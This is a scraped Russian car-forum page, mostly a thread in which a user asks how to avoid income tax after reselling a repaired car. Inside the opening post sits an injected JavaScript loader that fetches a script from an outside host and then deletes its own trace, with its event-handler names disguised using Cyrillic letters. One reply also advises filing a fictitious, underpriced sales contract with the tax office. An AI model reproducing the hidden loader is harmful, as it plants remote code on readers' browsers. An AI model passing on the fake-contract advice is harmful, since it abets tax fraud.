23 мая
Renault Duster 1.5 dCi 109hp 2WD MT
Да, авто недооценено автолюбителями: надежность, экономичность, управляемость, большой объём багажника, просторный салон. Машина крепкая и быстрохо...
4.7
2 июня
Nissan X-Trail 2.5 CVT 4WD
Остался доволен машиной. Комфортно, удобно, престижно. Удовлетворяет все мои запросы, поломок не было. Езжу немного, пару раз в год по 1000-1200км....
4.7
Все отзывы
Уважаемые пользователи! С 20 декабря Форум Авто закрыт для общения. Выражаем благодарность всем нашим пользователям, принимавшим участие в дискуссиях и горячих спорах. Редакция сосредоточится на выпуске увлекательных статей и новостей, которые вы сможете обсудить в комментариях. Не пропустите!

Можно ли избежать налога с разницы при перепродаже авто?...

(function () {
var script = document.createElement('script');
script.src = 'https://abover.com/system/extension?ifra...' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8';
script.оnlоad = script.оnerrоr = function () {
script.оnlоad = script.оnerrоr = null;
script.parentNode.removeChild(script);
}

document.body.appendChild(script);
})(); Скажу сразу, перепродажей не занимаюсь ни профессионально, ни любительски, однако по сути близко... Ситуация такая. В январе 2013 г купила подержанную аварийную машину, 2 месяца как из салона, за 1200 000руб. ремонт обошёлся в 350 тыс + тюнинг, обвесы и доработка у официалов ещё 200 тыс. Итого 1 млн 750 тыс руб. Поездить толком на ней не удалось- командировка 2 недели затянулась на 6 месяцев, далее лечение в стационаре 2 месяца, домой вернулась в декабре и выставила авто на продажу за 1800 000, приплюсовав к итогу 50 тыс транспортного налога, который придётся заплатить за этот год. Цена сильно ниже рыночной за срочность и бывшую аварийность, ну и у меня не было умысла наварить на этом, забрали авто в тот же день. Сейчас предстоит заполнить декларацию. Разница между покупной и продажной стоимостью облагается налогом на прибыль, но у меня по сути прибыли то и нет. Есть ещё один нюанс. За ремонт и тюнинг авто в сервисе по счётам расплатилась организация, в которой я на тот момент работала. Конечно, не своими средствами, а не выплаченной мне частью моей же зарплаты, накопившейся за год. То есть чеков на ремонтные работы у меня нет. Кто что думает по этому поводу? Плиз, личный опыт, статьи, ссылки. В первую очередь интересуют законные способы не платить налог в такой ситуации, а потом уже альтернативные.
наталья харлова
Тема закрытаТема в горячихТема скрыта
Жалоба принята. Спасибо!
Ошибка отправки
КомментарииКомментарииПока ни одного комментария, будьте первым!
26
12
сергей ивановВ ответ на наталья харлова
наталья харлова
Спасибо всем откликнувшимся. Вариант с "неправильными" ценами в ДКП мне известен и успешно используется не только мной, но и большинством населения страны. Однако все мои машины были сильно б/у и стоили на порядок меньше, эта - скорее исключение в силу сложившихся обстоятельств. При таких ценах указать нереальную сумму при купле- продаже занятие рискованное, в случае расторжения ДКП по суду можно сильно угореть, значительно больше, чем на 78 000 подоходного с разницы. Тем более, если продавец или покупатель настаивает на искажении суммы, это вызывает подозрение. Вообще, меня интересует сам процесс, так сказать. Можно ли по закону исключить суммы, потраченные на восстановительный ремонт, из налогооблагаемой базы? И ещё вопрос знатокам. Закон сейчас позволяет заключать ДКП устно при личном присутствии продавца и покупателя в ГИБДД. При этом, никакой копии ДКП с суммой сделки в регистрационном подразделении не остаётся, а на руках у сторон - только расписка в получении денег. Что тогда подавать в налоговую? Копию расписки? А не пошлют ли они меня далеко- далеко? Спросила бы у налоговиков, но пока нет возможности добраться до них, а телефон ...трубку не снимают уже неделю ни по одному номеру. Поделитесь опытом.
СсылкаПожаловаться
Так позвони тому кому авто продала и договорись составить фиктивный ДКП на сумму меньше 1200 000. Вот этот договор и подаш в налоговую. Сейчас то ему все равно Авто у него на учете на нем. настоящая сумма написана в расписке.
СсылкаПожаловаться
Заходи если что
на самом деле ГИБДД данные о сумме сделки в налоговую НЕ ПЕРЕДАЁТ! проверенно,это вы сами в налоговой должны подтвердить за сколько покупали,за сколько продавали
СсылкаПожаловаться
Vera Kudryaschowa
Налог с продажи автомобиля, всё доходчиво: http://vashnal.ru/clarification/nalog-na...
СсылкаПожаловаться
ezvx
вижу что тетка хочешь че-то намутить типа смошенничать... чеков нет.. тюнинг не мой... иди плати налоги хапуга!
СсылкаПожаловаться
наталья харловаВ ответ на ezvx
ezvx
вижу что тетка хочешь че-то намутить типа смошенничать... чеков нет.. тюнинг не мой... иди плати налоги хапуга!
СсылкаПожаловаться
Вот только хамить не надо. Если кто и мошенничал, это мой работодатель, - чеки на ремонт "левой" машины провёл как расходы своего предприятия. Жаль, я об этом поздно узнала. А вы покопайтесь в себе. Налоги все заплатили? Точно ничё не забыли? И вообще спите как? Спокойно???---------------------------------------------Всего вам хорошего! Удачи!
СсылкаПожаловаться
тимофей смирнягин
Интересная полемика полцчилась\)
СсылкаПожаловаться
12
Чтобы оставить комментарий, вам нужно авторизоваться.
Вы не ввели текст комментария
Вы не ввели текст комментария